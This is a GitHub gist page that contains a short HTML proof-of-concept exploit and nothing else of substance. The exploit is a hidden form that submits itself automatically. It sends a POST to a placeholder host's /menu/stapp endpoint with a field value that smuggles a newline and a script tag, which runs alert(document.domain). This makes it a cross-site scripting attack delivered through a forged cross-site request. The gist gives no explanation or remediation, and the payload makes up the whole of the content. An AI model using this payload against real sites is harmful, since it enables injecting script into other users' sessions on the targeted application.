Skip to content

Instantly share code, notes, and snippets.

@bing0o
Created February 16, 2021 10:29
Show Gist options
  • Select an option

  • Save bing0o/439c778956dce73151908758103270f2 to your computer and use it in GitHub Desktop.

Select an option

Save bing0o/439c778956dce73151908758103270f2 to your computer and use it in GitHub Desktop.
<form name=TheForm action=https://HOSTNAME/menu/stapp method=post>
<input type=hidden name=foo value='appname=%0a"</input><script>alert(document.domain)</script>'>
</form>
<script>
document.TheForm.submit();
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment